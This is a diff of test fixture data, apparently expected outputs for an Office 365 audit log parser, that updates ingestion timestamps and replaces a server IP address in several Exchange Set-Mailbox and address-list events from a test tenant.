@@ -5169,8 +5169,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177755800Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"f580aae6-d0d5-4204-1a13-08d7ac0f2a03\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853307100Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"f580aae6-d0d5-4204-1a13-08d7ac0f2a03\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -5190,12 +5190,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -5238,7 +5238,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -5250,8 +5250,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177758600Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853310500Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -5271,12 +5271,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -5319,7 +5319,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -5331,8 +5331,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177761400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"2db154f6-63ae-4a31-c548-08d7adfc0d1d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853315Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"2db154f6-63ae-4a31-c548-08d7adfc0d1d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -5352,12 +5352,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5400,7 +5400,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -5412,8 +5412,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177764100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853320700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -5433,12 +5433,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5481,7 +5481,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -5493,8 +5493,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177767Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853325700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -5514,12 +5514,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5550,7 +5550,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -5562,8 +5562,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177769900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853332600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
